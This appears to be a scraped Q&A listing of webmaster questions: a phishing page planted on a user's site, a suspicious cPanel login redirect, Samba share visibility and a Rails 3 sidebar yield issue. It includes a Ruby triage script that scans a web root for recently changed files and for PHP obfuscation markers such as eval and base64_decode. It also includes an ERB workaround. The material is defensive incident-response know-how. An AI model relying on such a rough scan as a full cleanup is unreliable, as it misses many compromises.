    I'm a newbie webmaster. I've got a domain and a site... and no clue about the web (I'm OK with files and programs...). I got a message from Google that my site is a possible phishing site, with a link to the suspect page: http://www.mydomain.com/~phishers/Paypal/us/Confirm.php Needless to say, I didn't put that up. Can someone point me to a good tutorial on what to do now? I'd like to figure out what happened so I can defend against it next time. How do I identify what kind of attack this is? (A first-pass triage sketch follows this entry.) Also, what is the tilde doing in the URL path? I couldn't find any path like this in my hosting account, so I'm not entirely sure how to delete it.

    Read the article
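    As a first pass (an assumption: you have shell access to the account and the site lives under ~/public_html), it often helps to list files changed around the time of the compromise and to flag contents that commonly appear in injected PHP. A rough triage sketch, not a cleanup tool:

      #!/usr/bin/env ruby
      # Rough triage for a compromised web root: list recently changed files
      # and flag PHP files containing patterns typical of injected code.
      # WEB_ROOT and DAYS are assumptions; adjust them for the real account.
      WEB_ROOT = File.expand_path('~/public_html')
      DAYS     = 14
      MARKERS  = [/base64_decode\s*\(/, /eval\s*\(/, /gzinflate\s*\(/, /str_rot13\s*\(/]

      cutoff = Time.now - DAYS * 24 * 60 * 60

      Dir.glob(File.join(WEB_ROOT, '**', '*'), File::FNM_DOTMATCH).each do |path|
        next unless File.file?(path)
        recent  = File.mtime(path) > cutoff
        flagged = path.end_with?('.php') &&
                  MARKERS.any? { |re| File.read(path) =~ re rescue false }
        puts "#{recent ? 'RECENT ' : '       '}#{flagged ? 'SUSPECT ' : '        '}#{path}" if recent || flagged
      end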

  • My cPanel login is being redirected. How can I resolve this?

    - by Suz
    I'm trying to get to cPanel to manage my website. When I type www.mydomain.com:2082 into the browser window, the request seems to be redirected. I made a screen-cast so I could slow down the changes in the address bar: first it seems to go to http://www.mydomain.com:2082/login, then to http://www.mydomain.com/cgi-sys/login.cgi. At this point a screen briefly appears saying "Login attempt failed", and then the address is redirected to https://this22.thishost.com:2083/, which has no relation to my site at all. This looks to me like the system has been attacked and the login.cgi file compromised. Any suggestions on how to analyze this further, or fix it? Of course my "free hosting" isn't any help at all.

    Read the article

  • Samba login before requesting list of shares?

    - by user69359
    I'm relatively inexperienced at this and am starting to get a little frustrated. I have an Ubuntu server with several user accounts. The Samba file server hosts a number of public shares plus each user's home directory as a private share. When connecting to the server from my OS X machine, I am prompted to enter my login data and get an overview of all the public shares plus my account's home directory share, exactly the way I want it. However, when I connect to the server from an Ubuntu machine, I am never prompted for any login data and can only see the public folders. If a user wants to connect to their home directory on the server, they have to go through "Connect to Server" and mount their specific private share. Is there any way to configure Samba or the Ubuntu client so the user experience is more like it is on my OS X box? Thank you for your time!

    Read the article

  • Rails 3 - yield return or callback won't call in view <%= yield(:sidebar) || render('shared/sidebar') %>

    - by rzar
    Hey folks, I'm migrating a website from Rails 2 (latest) to Rails 3 (beta2), testing with Ruby 1.9.1-p378 and Ruby 1.9.2dev (2010-04-05 trunk 27225). I'm stuck in a situation where I don't know which part is supposed to work. I suspect yield is the problem, but I don't know exactly. In my layout files I use the following technique quite often:

    app/views/layouts/application.html.erb: <%= yield(:sidebar) || render('shared/sidebar') %>

    For example, the partial looks like:

    app/views/shared/_sidebar.html.erb: <p>Default sidebar Content. Bla Bla</p>

    Now for the key part: in any view, I want to be able to create an optional content_for block. This can contain a piece of HTML, etc.; example below. If this block is set, the HTML inside it should be rendered in application.html.erb. If not, Rails should render the partial at shared/_sidebar.html.erb instead.

    app/views/books/index.html.erb: <% content_for :sidebar do %> <strong>You have to read REWORK, a book from 37signals!</strong> <% end %>

    So you get the idea, hopefully. This technique worked well in any Rails 2.x application. Now, in Rails 3 (beta2), only the yield part works; the || render('shared/sidebar') side is never processed by Rails (or maybe Ruby). Thanks for your input and time! (A sketch of a common workaround follows this entry.)

    Read the article
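    In Rails 3 the capture buffer that yield(:sidebar) returns is an empty string rather than nil when nothing was captured, so the || branch never runs. The usual workaround is to test for the content explicitly, for example with content_for? (if that helper is missing in beta2, checking yield(:sidebar).blank? behaves the same way). A sketch of the layout:

      <%# app/views/layouts/application.html.erb -- sketch of the workaround.
          content_for?(:sidebar) is true only when a view actually captured
          something for :sidebar; otherwise the default partial is rendered. %>
      <% if content_for?(:sidebar) %>
        <%= yield(:sidebar) %>
      <% else %>
        <%= render 'shared/sidebar' %>
      <% end %>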
